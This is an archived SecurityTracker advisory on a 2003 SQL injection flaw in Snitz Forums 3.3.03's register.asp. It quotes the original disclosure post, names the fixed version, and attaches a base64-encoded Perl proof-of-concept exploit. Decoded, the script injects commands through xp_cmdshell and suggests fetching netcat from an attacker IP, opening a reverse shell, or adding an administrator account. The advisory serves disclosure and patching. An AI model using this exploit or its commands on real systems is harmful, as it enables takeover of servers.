SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Snitz Forums Vendors:   Snitz Communications
Snitz Forums 2000 Input Validation Flaw in 'register.asp' Permits SQL Command Injection
SecurityTracker Alert ID:  1006743
SecurityTracker URL:  http://securitytracker.com/id/1006743
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 12 2003
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 3.3.03
Description:   A vulnerability was reported in Snitz Forums 2000. A remote user can execute stored procedures and non-interactive operating system commands on the system.

It is reported that the 'register.asp' script does not validate user-supplied input in the 'email' variable. A remote user can submit a specially crafted value for this variable to execute stored procedures, including 'xp_cmdshell'. A remote user can execute arbitrarily, non-interactive commands on the system via the xp_cmdshell procedure.

A demonstration exploit Perl script is included in the Source Message [it is Base64 encoded].

Impact:   A remote user can execute stored procedures on the system. A remote user can execute arbitrary, non-interactive shell commands on the operating system.
Solution:   The vendor has issued a fixed version (3.4.03), available at:

http://forum.snitz.com/specs.asp

Vendor URL:  forum.snitz.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [VulnWatch] Snitz Forum 3.3.03 Remote Command Execution


--Hush_boundary-3ebfc21a91dab
Content-type: text/plain

[Moderator: This was inadvertently sent to "VulnDiscuss" instead of "VulnWatch"
over the weekend.]

Overview:
Snitz Forums 2000, one of the best ASP based bulletin board systems on
the market. Getting better every day! A complete board system (forum)
that allows the user access to a friendly and intuitive interface.
http://forum.snitz.com 

Problem Description: 
Snitz Forums 3.3.03 has an SQL injection vulnerability in its "register.asp"
page with its "Email" variable. Because "register.asp" doesn't check
user input, remote users can execute stored procedures (such as "xp_cmdshell")
to arbitrarily run non-interactive commands on the system. 

Vendor Notification: 
Vendor notified last month. This is a deprecated version and users should
upgrade immediately. 

Versions Affected: 
3.3.03 
Most likely earlier versions (not tested) 

Fix: 
Upgrade to 3.4.03, the latest version. 

Exploit: 
See attached proof-of-concept Perl exploit.

--Hush_boundary-3ebfc21a91dab
Content-type: application/octet-stream; name="snitz_exec.pl"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="snitz_exec.pl"

IyEvdXNyL2Jpbi9wZXJsCgp1c2UgU29ja2V0OwoKcHJpbnQgIlxuUmVtb3RlIGNvbW1hbmQgZXhl
Y3V0aW9uIGFnYWluc3QgU25pdHogRm9ydW1zIDMuMy4wMyAoYW5kIHByb2JhYmx5IG90aGVycyku
XG4iOwpwcmludCAiWW91IGFjY2VwdCBmdWxsIHJlc3BvbnNpYmlsaXR5IGZvciB5b3VyIGFjdGlv
bnMgYnkgdXNpbmcgdGhpcyBzY3JpcHQuXG4iOwpwcmludCAiSU5URVJOQUwgVVNFIE9OTFkhISBE
TyBOT1QgRElTVFJJQlVURSEhXG4iOwoKcHJpbnQgIlxuV2ViIHNlcnZlcj8gW3d3dy5lbnRlcnRo
ZWdhbWUuY29tXTogIjsKbXkgJHdlYnNlcnZlciA9IDxTVERJTj47CmNob21wICR3ZWJzZXJ2ZXI7
CmlmKCAkd2Vic2VydmVyIGVxICIiICkKewoJJHdlYnNlcnZlciA9ICJ3d3cuZW50ZXJ0aGVnYW1l
LmNvbSI7Cn0KCnByaW50ICJcbldlYiBzZXJ2ZXIgcG9ydD8gWzgwXTogIjsKbXkgJHBvcnQgPSA8
U1RESU4+OwpjaG9tcCAkcG9ydDsKaWYoICRwb3J0IGVxICIiICkKewoJJHBvcnQgPSA4MDsKfQoK
cHJpbnQgIlxuQWJzb2x1dGUgcGF0aCB0byBcInJlZ2lzdGVyLmFzcFwiPyBbL2ZvcnVtL3JlZ2lz
dGVyLmFzcF06ICI7Cm15ICRwYXRoID0gPFNURElOPjsKY2hvbXAgJHBhdGg7CmlmKCAkcGF0aCBl
cSAiIiApCnsKCSRwYXRoID0gIi9mb3J1bS9yZWdpc3Rlci5hc3AiOwp9CgpwcmludCAiXG5Db21t
YW5kIHRvIGV4ZWN1dGUgbm9uLWludGVyYWN0aXZlbHlcbiI7CnByaW50ICIgICAgIEV4YW1wbGUg
Y29tbWFuZHM6IHRmdHAgLWkgWW91ci5JUC5IZXJlIEdFVCBuYy5leGVcbiI7CnByaW50ICIgICAg
ICAgICAgICAgICAgICAgICAgIG5jLmV4ZSAtZSBjbWQuZXhlIFlvdXIuSVAuSGVyZSBZb3VyTmV0
Y2F0TGlzdGVuaW5nUG9ydEhlcmVcbiI7CnByaW50ICIgICAgIG9yOiAgICAgICAgICAgICAgIG5l
dCB1c2VyIGg0eDByIC9hZGQgfCBuZXQgbG9jYWxncm91cCBBZG1pbmlzdHJhdG9ycyBoNHgwciAv
YWRkXG4iOwpwcmludCAiWW91ciBjb21tYW5kOiAiOwpteSAkY29tbWFuZCA9IDxTVERJTj47CmNo
b21wICRjb21tYW5kOwokY29tbWFuZCA9fiBzL1wgL1wlMjAvZzsKCmlmKCBvcGVuX1RDUCggRklM
RUhBTkRMRSwgJHdlYnNlcnZlciwgODAgKSA9PSB1bmRlZiApCnsKCXByaW50ICJFcnJvciBjb25u
ZWN0aW5nIHRvICR3ZWJzZXJ2ZXJcbiI7CglleGl0KCAwICk7Cn0KZWxzZQp7CglteSAkZGF0YTEg
PSAkcGF0aCAuICJcP21vZGVcPURvSXQiOwoJbXkgJGRhdGEyID0gIkVtYWlsXD1cJ1wlMjBleGVj
XCUyMG1hc3Rlci4ueHBfY21kc2hlbGxcJTIwXCciIC4gJGNvbW1hbmQuICJcJ1wlMjAtLVwmTmFt
ZVw9c25pdHoiOwoJbXkgJGxlbmd0aCA9IGxlbmd0aCggJGRhdGEyICk7CgoJcHJpbnQgRklMRUhB
TkRMRSAiUE9TVCAkZGF0YTEgSFRUUC8xLjFcbiI7CglpZiggJHBvcnQgPT0gODAgKQoJewoJCXBy
aW50IEZJTEVIQU5ETEUgIkhvc3Q6ICR3ZWJzZXJ2ZXJcbiI7Cgl9CgllbHNlCgl7CgkJcHJpbnQg
RklMRUhBTkRMRSAiSG9zdDogJHdlYnNlcnZlcjokcG9ydFxuIjsKCX0KCXByaW50IEZJTEVIQU5E
TEUgIkFjY2VwdDogKi8qXG4iOwoJcHJpbnQgRklMRUhBTkRMRSAiVXNlci1BZ2VudDogVXNlci1B
Z2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgNi4wOyBXaW5kb3dzIE5UIDUuMClc
biI7CglwcmludCBGSUxFSEFORExFICJLZWVwLUFsaXZlOiAzMDBcbiI7CglwcmludCBGSUxFSEFO
RExFICJSZWZlcmVyOiBodHRwOlwvXC8kd2Vic2VydmVyJHBhdGhcP21vZGVcPVJlZ2lzdGVyXG4i
OwoJcHJpbnQgRklMRUhBTkRMRSAiQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3Jt
LXVybGVuY29kZWRcbiI7CglwcmludCBGSUxFSEFORExFICJDb250ZW50LUxlbmd0aDogJGxlbmd0
aFxuXG4iOwoJcHJpbnQgRklMRUhBTkRMRSAiJGRhdGEyIjsKCglwcmludCAiXG5TUUwgaW5qZWN0
aW9uIGNvbW1hbmQgc2VudC4gSWYgeW91IGFyZSB3YWl0aW5nIGZvciBhIHNoZWxsIG9uIHlvdXIg
bGlzdGVuaW5nXG4iOwoJcHJpbnQgIm5ldGNhdCwgaGl0IFwiZW50ZXJcIiBhIGNvdXBsZSBvZiB0
aW1lcyB0byBiZSBzYWZlLlxuXG4iOwoKCWNsb3NlKCBGSUxFSEFORExFICk7Cn0KCnN1YiBvcGVu
X1RDUAp7CglteSggJEZTLCAkZGVzdCwgJHBvcnQgKSA9IEBfOwoKCW15ICRwcm90byA9IGdldHBy
b3RvYnluYW1lKCAndGNwJyApOwoJc29ja2V0KCAkRlMsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAk
cHJvdG8gKTsKCW15ICRzaW4gPSBzb2NrYWRkcl9pbiggJHBvcnQsIGluZXRfYXRvbiggJGRlc3Qg
KSk7Cgljb25uZWN0KCAkRlMsICRzaW4gKSB8fCByZXR1cm4gdW5kZWY7CgoJbXkgJG9sZF9maCA9
IHNlbGVjdCggJEZTICk7CgkkfCA9IDE7CglzZWxlY3QoICRvbGRfZmggKTsKCXJldHVybiAxOwp9
Cg==

--Hush_boundary-3ebfc21a91dab--



Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2

Free, ultra-private instant messaging with Hush Messenger
https://www.hushmail.com/services.php?subloc=messenger&l=434

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC